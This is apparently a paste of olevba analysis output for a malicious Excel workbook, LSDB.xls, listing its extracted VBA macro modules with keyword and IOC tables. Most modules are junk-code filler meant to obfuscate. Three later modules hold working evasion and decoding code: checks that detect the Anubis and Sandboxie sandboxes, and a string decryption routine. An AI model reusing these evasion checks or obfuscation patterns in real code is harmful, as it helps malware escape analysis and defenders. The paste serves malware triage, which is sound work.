- UAbJUuZEbq = 8:
- Do While UAbJUuZEbq < 19
- DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
- Loop
- GoTo ByTJnnNpIe
- ByTJnnNpIe:
- GoTo XdDlNokXea
- XdDlNokXea:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function oDfMRCicVJUthYHACPChenmxiuRPudkVPUGdS()
- Dim ZDxnSsrUfJ As Integer
- ZDxnSsrUfJ = 2:
- Do While ZDxnSsrUfJ < 3
- DoEvents: ZDxnSsrUfJ = ZDxnSsrUfJ + 1
- Loop
- If "IQSTPbJfxo" = "pAOqxvNtgg" Then End
- GoTo yescSENAnT
- yescSENAnT:
- Dim ZqCUZCAGoW As Long
- ZqCUZCAGoW = "1147":
- End Function
- Private Sub xcOlabrueiDsqqpSLOranNVQrnAoEDtOYTovB()
- Dim ocgNBLamvb As Integer
- ocgNBLamvb = 9:
- Do While ocgNBLamvb < 7
- DoEvents: ocgNBLamvb = ocgNBLamvb + 1
- Loop
- GoTo ZKChkioXxI
- ZKChkioXxI:
- If "nzQemcGptO" = "EbCBdWsWly" Then End
- Dim zbcyLlHFZj As Integer
- zbcyLlHFZj = 1:
- Do While zbcyLlHFZj < 28
- DoEvents: zbcyLlHFZj = zbcyLlHFZj + 1
- Loop
- End Sub
- Private Function EJaatNBMSZQyrtgBZWfEpampntVcNOsxVjrBL()
- If "KKjMeBetAo" = "jLHtBXPGhr" Then End
- GoTo IPuFlFyMXw
- IPuFlFyMXw:
- Dim KDFSFkhRpa As Integer
- KDFSFkhRpa = 10:
- Do While KDFSFkhRpa < 17
- DoEvents: KDFSFkhRpa = KDFSFkhRpa + 1
- Loop
- If "SYgnysXJGV" = "WMWZDxnSsr" Then End
- End Function
- Private Function RDGjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQ()
- GoTo CUZCAGoWAa
- CUZCAGoWAa:
- If "oDEuxHLGWt" = "tTvORVDqQY" Then End
- Dim qDrgfwRBwr As Integer
- qDrgfwRBwr = 3:
- Do While qDrgfwRBwr < 14
- DoEvents: qDrgfwRBwr = qDrgfwRBwr + 1
- Loop
- If "VoocgNBLam" = "vbvURaZKCh" Then End
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function kuCVoCNmBRATVIVBxHfqCOKIOWEoiNyWLMcmP()
- Dim NnmPaEhXdD As Long
- NnmPaEhXdD = "7864":
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub zDmqLByyYBTpTivowYzvIwMECWgbwEJaatNBM()
- Dim buwjdcziHs As Long
- buwjdcziHs = "8519":
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module6.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function SZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJ()
- GoTo SyYGIjFrZv
- SyYGIjFrZv:
- Dim fQEgnsDKdw As Integer
- fQEgnsDKdw = 6:
- Do While fQEgnsDKdw < 6
- DoEvents: fQEgnsDKdw = fQEgnsDKdw + 1
- Loop
- Dim JbbdqdJGPn As Long
- JbbdqdJGPn = "5222":
- Dim wsqWeMXqvH As Integer
- wsqWeMXqvH = 8:
- Do While wsqWeMXqvH < 16
- DoEvents: wsqWeMXqvH = wsqWeMXqvH + 1
- Loop
- GoTo kuxbWMqqQs
- kuxbWMqqQs:
- GoTo hLAggoQrnA
- hLAggoQrnA:
- End Function
- Private Sub GculmwLnUsKqddRVCpzPbKXkQNWnyqWZXDlTw()
- GoTo NbcTWfjeUS
- NbcTWfjeUS:
- Dim RtMpTbPowr As Integer
- RtMpTbPowr = 1:
- Do While RtMpTbPowr < 1
- DoEvents: RtMpTbPowr = RtMpTbPowr + 1
- Loop
- If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
- If "UspyXiaGJH" = "mVvgHMxODk" Then End
- If "OSmcAazCuR" = "ujXQYeXjYn" Then End
- Dim DxIDyfkCbv As Integer
- DxIDyfkCbv = 2:
- Do While DxIDyfkCbv < 29
- DoEvents: DxIDyfkCbv = DxIDyfkCbv + 1
- Loop
- End Sub
- Public Sub MSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHg()
- GoTo nefQEgnsDK
- nefQEgnsDK:
- Dim wkvVJbbdqd As Long
- wkvVJbbdqd = "6334":
- If "PnZKwsqWeM" = "XqvHetukux" Then End
- Dim WMqqQsEhLA As Long
- WMqqQsEhLA = "8220":
- GoTo oQrnAhEWNO
- oQrnAhEWNO:
- Dim mPvUlSFFsX As Long
- mPvUlSFFsX = "6710":
- End Sub
- Public Function pzPbKXkQNWnyqWZXDlTwxcOlabrueiDsqqpSL()
- Dim PowrToBpFE As Integer
- PowrToBpFE = 1:
- Do While PowrToBpFE < 6
- DoEvents: PowrToBpFE = PowrToBpFE + 1
- Loop
- Dim uQXCttNNaF As Integer
- uQXCttNNaF = 8:
- Do While uQXCttNNaF < 22
- DoEvents: uQXCttNNaF = uQXCttNNaF + 1
- Loop
- Dim ZLUAUspyXi As Long
- ZLUAUspyXi = "1337":
- If "JHmVvgHMxO" = "DkBEOSmcAa" Then End
- Dim CuRujXQYeX As Integer
- CuRujXQYeX = 5:
- Do While CuRujXQYeX < 2
- DoEvents: CuRujXQYeX = CuRujXQYeX + 1
- Loop
- Dim fDxIDyfkCb As Integer
- fDxIDyfkCb = 3:
- Do While fDxIDyfkCb < 16
- DoEvents: fDxIDyfkCb = fDxIDyfkCb + 1
- Loop
- End Function
- Private Function BMSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHH()
- Dim ZDSyYGIjFr As Long
- ZDSyYGIjFr = "8466":
- Dim dwkvVJbbdq As Integer
- dwkvVJbbdq = 5:
- Do While dwkvVJbbdq < 19
- DoEvents: dwkvVJbbdq = dwkvVJbbdq + 1
- Loop
- Dim bWMqqQsEhL As Long
- bWMqqQsEhL = "8843":
- Dim goQrnAhEWN As Long
- goQrnAhEWN = "2337":
- Dim DRBqclylrO As Long
- DRBqclylrO = "2721":
- If "aSxayeNuYZ" = "dpNbcTWfje" Then End
- End Function
- Private Sub sqqpSLOranNVQrnAoEDtOYTovBSSllZdKxIXj()
- If "spyXiaGJHm" = "VvgHMxODkB" Then End
- Dim voCNtarATV As Long
- voCNtarATV = "4335":
- Dim YHfRbORPVw As Integer
- YHfRbORPVw = 8:
- Do While YHfRbORPVw < 10
- DoEvents: YHfRbORPVw = YHfRbORPVw + 1
- Loop
- GoTo UZwLTcmWTO
- UZwLTcmWTO:
- If "IihKcZDSyY" = "GIjFrZvnef" Then End
- GoTo EgnsDKdwkv
- EgnsDKdwkv:
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module8.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub XMNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkX()
- Dim IwGvhqdRwt As Integer
- IwGvhqdRwt = 1:
- Do While IwGvhqdRwt < 26
- DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
- Loop
- Dim xcfEjSzdEJ As Long
- xcfEjSzdEJ = "2523":
- If "ghYBkPjzXX" = "wZrVygUtbw" Then End
- Dim UgVKJAueAv As Integer
- UgVKJAueAv = 6:
- Do While UgVKJAueAv < 28
- DoEvents: UgVKJAueAv = UgVKJAueAv + 1
- Loop
- Dim ySsGKqeoEQ As Integer
- ySsGKqeoEQ = 10:
- Do While ySsGKqeoEQ < 23
- DoEvents: ySsGKqeoEQ = ySsGKqeoEQ + 1
- Loop
- Dim xuEcOfLOMS As Integer
- xuEcOfLOMS = 10:
- Do While xuEcOfLOMS < 22
- DoEvents: xuEcOfLOMS = xuEcOfLOMS + 1
- Loop
- Dim mRDtIQGjTX As Integer
- mRDtIQGjTX = 5:
- Do While mRDtIQGjTX < 28
- DoEvents: mRDtIQGjTX = mRDtIQGjTX + 1
- Loop
- Dim feHLncVDFg As Long
- feHLncVDFg = "3899":
- Dim DskicNIdkp As Integer
- DskicNIdkp = 10:
- Do While DskicNIdkp < 28
- DoEvents: DskicNIdkp = DskicNIdkp + 1
- Loop
- End Sub
- Private Function OHuGMTKslnBuTQZxjUgjhnPWHImrPEluFolgW()
- Dim pIeIXdDlNo As Integer
- pIeIXdDlNo = 5:
- Do While pIeIXdDlNo < 16
- DoEvents: pIeIXdDlNo = pIeIXdDlNo + 1
- Loop
- GoTo aTjLVjlsYi
- aTjLVjlsYi:
- If "iCpaAOFngi" = "viOLuTEPbx" Then End
- Dim bKrCWamKyz As Long
- bKrCWamKyz = "6521":
- If "cgbRvWVxJm" = "QfMltvwsFm" Then End
- Dim BSTdrUBZqx As Long
- BSTdrUBZqx = "3405":
- If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
- Dim zdEJuSghYB As Integer
- zdEJuSghYB = 9:
- Do While zdEJuSghYB < 24
- DoEvents: zdEJuSghYB = zdEJuSghYB + 1
- Loop
- If "zXXwZrVygU" = "tbwYUgVKJA" Then End
- End Function
- Private Sub ISNipuMMfGTxESCRdmSmLIRpbTYbZfnOyzeQH()
- Dim jTXrhFfeHL As Long
- jTXrhFfeHL = "5576":
- If "DFgCoDskic" = "NIdkpHHatH" Then End
- Dim GwFYANhGDM As Long
- GwFYANhGDM = "7273":
- Dim HTWUAbJUuZ As Integer
- HTWUAbJUuZ = 5:
- Do While HTWUAbJUuZ < 22
- DoEvents: HTWUAbJUuZ = HTWUAbJUuZ + 1
- Loop
- GoTo YhrByTJnnN
- YhrByTJnnN:
- GoTo IeIXdDlNok
- IeIXdDlNok:
- GoTo eaTjLVjlsY
- eaTjLVjlsY:
- Dim vbKrCWamKy As Long
- vbKrCWamKy = "9276":
- GoTo JBSTdrUBZq
- JBSTdrUBZq:
- End Sub
- Public Function kXXLPvjtJVEReKHQhTLQTRXfNqrWIfUVloYcw()
- If "wZrVygUtbw" = "YUgVKJAueA" Then End
- GoTo ChZySsGKqe
- ChZySsGKqe:
- Dim QZFZxuEcOf As Integer
- QZFZxuEcOf = 5:
- Do While QZFZxuEcOf < 9
- DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
- Loop
- If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
- Dim PcVDFgCoDs As Long
- PcVDFgCoDs = "8147":
- Dim cNIdkpHHat As Long
- cNIdkpHHat = "3146":
- Dim yGwFYANhGD As Integer
- yGwFYANhGD = 9:
- Do While yGwFYANhGD < 23
- DoEvents: yGwFYANhGD = yGwFYANhGD + 1
- Loop
- If "HTWUAbJUuZ" = "EbqYhrByTJ" Then End
- GoTo nNpIeIXdDl
- nNpIeIXdDl:
- End Function
- Private Sub aCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcPLJ()
- GoTo CWamKyzpAc
- CWamKyzpAc:
- GoTo bRvWVxJmQf
- bRvWVxJmQf:
- If "ltvwsFmJBS" = "TdrUBZqxKK" Then End
- Dim CIwGvhqdRw As Long
- CIwGvhqdRw = "7156":
- GoTo UfxcfEjSzd
- UfxcfEjSzd:
- Dim JuSghYBkPj As Integer
- JuSghYBkPj = 8:
- Do While JuSghYBkPj < 6
- DoEvents: JuSghYBkPj = JuSghYBkPj + 1
- Loop
- If "wZrVygUtbw" = "YUgVKJAueA" Then End
- GoTo oEQZFZxuEc
- oEQZFZxuEc:
- Dim OMSaBlmRDt As Integer
- OMSaBlmRDt = 4:
- Do While OMSaBlmRDt < 29
- DoEvents: OMSaBlmRDt = OMSaBlmRDt + 1
- Loop
- End Sub
- Private Function twgkFVssSuNjNcpiqStpCqGxvQavRxDUUOHuG()
- Dim FYANhGDMkW As Integer
- FYANhGDMkW = 1:
- Do While FYANhGDMkW < 15
- DoEvents: FYANhGDMkW = FYANhGDMkW + 1
- Loop
- Dim UAbJUuZEbq As Integer
- UAbJUuZEbq = 8:
- Do While UAbJUuZEbq < 19
- DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
- Loop
- GoTo ByTJnnNpIe
- ByTJnnNpIe:
- GoTo XdDlNokXea
- XdDlNokXea:
- Dim jLVjlsYiPi As Integer
- jLVjlsYiPi = 2:
- Do While jLVjlsYiPi < 20
- DoEvents: jLVjlsYiPi = jLVjlsYiPi + 1
- Loop
- GoTo AOFngiviOL
- AOFngiviOL:
- GoTo EPbxvbKrCW
- EPbxvbKrCW:
- GoTo mKyzpAcgbR
- mKyzpAcgbR:
- Dim WVxJmQfMlt As Long
- WVxJmQfMlt = "2151":
- End Function
- Public Function KGsaWofgqFhOmEkXXLPvjtJVEReKHQhTLQTRX()
- Dim ueAvChZySs As Integer
- ueAvChZySs = 6:
- Do While ueAvChZySs < 14
- DoEvents: ueAvChZySs = ueAvChZySs + 1
- Loop
- Dim eoEQZFZxuE As Long
- eoEQZFZxuE = "6270":
- GoTo fLOMSaBlmR
- fLOMSaBlmR:
- GoTo tIQGjTXrhF
- tIQGjTXrhF:
- Dim eHLncVDFgC As Integer
- eHLncVDFgC = 3:
- Do While eHLncVDFgC < 7
- DoEvents: eHLncVDFgC = eHLncVDFgC + 1
- Loop
- GoTo kicNIdkpHH
- kicNIdkpHH:
- If "HsyGwFYANh" = "GDMkWHTWUA" Then End
- GoTo UuZEbqYhrB
- UuZEbqYhrB:
- Dim TJnnNpIeIX As Long
- TJnnNpIeIX = "5651":
- End Function
- Private Function qyaCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcP()
- GoTo gbRvWVxJmQ
- gbRvWVxJmQ:
- If "MltvwsFmJB" = "STdrUBZqxK" Then End
- Dim SzdEJuSghY As Integer
- SzdEJuSghY = 2:
- Do While SzdEJuSghY < 14
- DoEvents: SzdEJuSghY = SzdEJuSghY + 1
- Loop
- GoTo jzXXwZrVyg
- jzXXwZrVyg:
- GoTo GKqeoEQZFZ
- GKqeoEQZFZ:
- If "uEcOfLOMSa" = "BlmRDtIQGj" Then End
- GoTo rhFfeHLncV
- rhFfeHLncV:
- If "FgCoDskicN" = "IdkpHHatHs" Then End
- If "GwFYANhGDM" = "kWHTWUAbJU" Then End
- End Function
- Public Function ImrPEluFolgWBBaDVrVkRqyaCxKrOGXYiwZGL()
- Dim CpaAOFngiv As Integer
- CpaAOFngiv = 3:
- Do While CpaAOFngiv < 24
- DoEvents: CpaAOFngiv = CpaAOFngiv + 1
- Loop
- GoTo amKyzpAcgb
- amKyzpAcgb:
- If "vWVxJmQfMl" = "tvwsFmJBST" Then End
- GoTo rUBZqxKKxC
- rUBZqxKKxC:
- Dim wGvhqdRwtc As Long
- wGvhqdRwtc = "9280":
- Dim uSghYBkPjz As Integer
- uSghYBkPjz = 6:
- Do While uSghYBkPjz < 21
- DoEvents: uSghYBkPjz = uSghYBkPjz + 1
- Loop
- If "ZrVygUtbwY" = "UgVKJAueAv" Then End
- Dim hZySsGKqeo As Long
- hZySsGKqeo = "7148":
- If "ZFZxuEcOfL" = "OMSaBlmRDt" Then End
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module9.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function GjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQNW()
- If "xayeNuYZdp" = "NbcTWfjeUS" Then End
- Dim RtMpTbPowr As Integer
- RtMpTbPowr = 1:
- Do While RtMpTbPowr < 1
- DoEvents: RtMpTbPowr = RtMpTbPowr + 1
- Loop
- If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
- If "UspyXiaGJH" = "mVvgHMxODk" Then End
- If "OSmcAazCuR" = "ujXQYeXjYn" Then End
- End Function
- Public Sub ECWgbwEJaatNBMSZQyrtgBZWfEpampntVcNOs()
- GoTo cmWTOdIihK
- cmWTOdIihK:
- GoTo ZDSyYGIjFr
- ZDSyYGIjFr:
- Dim vnefQEgnsD As Integer
- vnefQEgnsD = 8:
- Do While vnefQEgnsD < 23
- DoEvents: vnefQEgnsD = vnefQEgnsD + 1
- Loop
- Dim kvVJbbdqdJ As Long
- kvVJbbdqdJ = "7718":
- Dim nZKwsqWeMX As Long
- nZKwsqWeMX = "3470":
- End Sub
- Private Sub UGdSsJTvAukPpoRDGjyfFNoQMYGculmwLnUsK()
- Dim sXDRBqclyl As Long
- sXDRBqclyl = "7338":
- Dim PaSxayeNuY As Integer
- PaSxayeNuY = 0:
- Do While PaSxayeNuY < 13
- DoEvents: PaSxayeNuY = PaSxayeNuY + 1
- Loop
- Dim bcTWfjeUSS As Integer
- bcTWfjeUSS = 8:
- Do While bcTWfjeUSS < 22
- DoEvents: bcTWfjeUSS = bcTWfjeUSS + 1
- Loop
- If "pTbPowrToB" = "pFEVpkQXCt" Then End
- Dim NNaFlzJZLU As Integer
- NNaFlzJZLU = 7:
- Do While NNaFlzJZLU < 21
- DoEvents: NNaFlzJZLU = NNaFlzJZLU + 1
- Loop
- End Sub
- Private Sub ROXvhZehfltUFGkWmbjzDmqLByyYBTpTivowY()
- If "YnfDxIDyfk" = "CbvoCNtarA" Then End
- Dim ICBYHfRbOR As Long
- ICBYHfRbOR = "95":
- GoTo wEopUZwLTc
- wEopUZwLTc:
- GoTo TOdIihKcZD
- TOdIihKcZD:
- If "yYGIjFrZvn" = "efQEgnsDKd" Then End
- End Sub
- Private Sub VJUthYHACPChenmxiuRPudkVPUGdSsJTvAukP()
- Dim EhLAggoQrn As Integer
- EhLAggoQrn = 7:
- Do While EhLAggoQrn < 4
- DoEvents: EhLAggoQrn = EhLAggoQrn + 1
- Loop
- Dim WNOYmPvUlS As Long
- WNOYmPvUlS = "4971":
- If "sXDRBqclyl" = "rOxPaSxaye" Then End
- If "ZdpNbcTWfj" = "eUSSRtMpTb" Then End
- Dim owrToBpFEV As Long
- owrToBpFEV = "3340":
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO sdfdsf.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfdsf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Declare Function GetVolumeInformation Lib "kernel32.dll" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
- Function IsAnubisPresent(ByVal OptionToCheck As Integer) As Boolean
- On Error Resume Next
- Set WShell = CreateObject("WScript.Shell")
- Select Case OptionToCheck
- Case 1
- If GetSerialNumber(Environ("SystemDrive") & "\") = "1824245000" Then
- IsAnubisPresent = True
- Else
- IsAnubisPresent = False
- End If
- Case 2
- If WShell.RedRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId") = "76487-337-8429955-22614" Then
- IsAnubisPresent = True
- Else
- IsAnubisPresent = False
- End If
- Case 3
- If UCase(App.EXEName) = "SAMPLE" Then
- IsAnubisPresent = True
- Else
- IsAnubisPresent = False
- End If
- Case 4
- If UCase(Environ("USERNAME")) = "USER" Then
- IsAnubisPresent = True
- Else
- IsAnubisPresent = False
- End If
- End Select
- End Function
- Public Function GetSerialNumber(DriveLetter As String) As Long
- Buffer1 = String$(255, Chr$(0))
- Buffer2 = String$(255, Chr$(0))
- Res = GetVolumeInformation(DriveLetter, Buffer1, Len(Buffer1), SerialNum, 0, 0, Buffer2, Len(Buffer2))
- GetSerialNumber = SerialNum
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | kernel32.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO sdfsdfsdf.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
- Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
- Select Case OptionToCheck
- Case 1 'Recomendado
- Dim hSbie As Long
- hSbie = GetModuleHandle("SbieDll.dll")
- If hSbie <> 0 Then
- IsSandBoxiePresent = True
- Else
- IsSandBoxiePresent = False
- End If
- Case 2 'No recomendado
- If InStr(MainFrm.Caption, "[#]") <> 0 Then
- IsSandBoxiePresent = True
- Else
- IsSandBoxiePresent = False
- End If
- End Select
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | SbieDll.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO sdfsdfsdffff.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/sdfsdfsdffff'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function MkSrpQP(ByVal strData As String, ByVal strKey As String)
- Dim bData() As Byte
- Dim cSIQhPPCpQ As Integer
- For cSIQhPPCpQ = 0 To 0
- If cSIQhPPCpQ = 5 Then End
- Next cSIQhPPCpQ
- Dim BGOEkt As Integer
- For BGOEkt = 0 To 0
- If BGOEkt = 5 Then End
- Next BGOEkt
- Dim bKey() As Byte
- Dim mCDZb As Integer
- For mCDZb = 0 To 0
- If mCDZb = 5 Then End
- Next mCDZb
- Dim hDCeLdOSt As Integer
- For hDCeLdOSt = 0 To 0
- If hDCeLdOSt = 5 Then End
- Next hDCeLdOSt
- bData = StrConv(strData, vbFromUnicode)
- Dim iALAxrJGeN As Integer
- For iALAxrJGeN = 0 To 0
- If iALAxrJGeN = 5 Then End
- Next iALAxrJGeN
- Dim DCeLdO As Integer
- For DCeLdO = 0 To 0
- If DCeLdO = 5 Then End
- Next DCeLdO
- bKey = StrConv(strKey, vbFromUnicode)
- Dim sGQzzmmNQKfJiAL As Integer
- For sGQzzmmNQKfJiAL = 0 To 0
- If sGQzzmmNQKfJiAL = 5 Then End
- Next sGQzzmmNQKfJiAL
- Dim tSeZqoKgExtE As Integer
- For tSeZqoKgExtE = 0 To 0
- If tSeZqoKgExtE = 5 Then End
- Next tSeZqoKgExtE
- For i = 0 To UBound(bData)
- Dim MLQBuBgGsI As Integer
- For MLQBuBgGsI = 0 To 0
- If MLQBuBgGsI = 5 Then End
- Next MLQBuBgGsI
- Dim PRyEYg As Integer
- For PRyEYg = 0 To 0
- If PRyEYg = 5 Then End
- Next PRyEYg
- If i <= UBound(bKey) Then
- Dim zAhBGOEktusx As Integer
- For zAhBGOEktusx = 0 To 0
- If zAhBGOEktusx = 5 Then End
- Next zAhBGOEktusx
- Dim QSHcSIQ As Integer
- For QSHcSIQ = 0 To 0
- If QSHcSIQ = 5 Then End
- Next QSHcSIQ
- bData(i) = bData(i) - bKey(i)
- Dim ALAxrJ As Integer
- For ALAxrJ = 0 To 0
- If ALAxrJ = 5 Then End
- Next ALAxrJ
- Dim DbVzAhBG As Integer
- For DbVzAhBG = 0 To 0
- If DbVzAhBG = 5 Then End
- Next DbVzAhBG
- Else
- Dim ddchRKRwJIZc As Integer
- For ddchRKRwJIZc = 0 To 0
- If ddchRKRwJIZc = 5 Then End
- Next ddchRKRwJIZc
- Dim vSNrta As Integer
- For vSNrta = 0 To 0
- If vSNrta = 5 Then End
- Next vSNrta
- bData(i) = bData(i) - bKey(i Mod UBound(bKey))
- Dim aeEspjB As Integer
- For aeEspjB = 0 To 0
- If aeEspjB = 5 Then End
- Next aeEspjB
- Dim ZhuVqUtK As Integer
- For ZhuVqUtK = 0 To 0
- If ZhuVqUtK = 5 Then End
- Next ZhuVqUtK
- End If
- Dim pQoae As Integer
- For pQoae = 0 To 0
- If pQoae = 5 Then End
- Next pQoae
- Dim xxZhuVqUtKlL As Integer
- For xxZhuVqUtKlL = 0 To 0
- If xxZhuVqUtKlL = 5 Then End
- Next xxZhuVqUtKlL
- Next i
- Dim spjBzVrPV As Integer
- For spjBzVrPV = 0 To 0
- If spjBzVrPV = 5 Then End
- Next spjBzVrPV
- Dim PkMRfcKYxxZ As Integer
- For PkMRfcKYxxZ = 0 To 0
- If PkMRfcKYxxZ = 5 Then End
- Next PkMRfcKYxxZ
- MkSrpQP = StrConv(bData, vbUnicode)
- Dim QScmhKas As Integer
- For QScmhKas = 0 To 0
- If QScmhKas = 5 Then End
- Next QScmhKas
- Dim xNdkmv As Integer
- For xNdkmv = 0 To 0
- If xNdkmv = 5 Then End
- Next xNdkmv
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement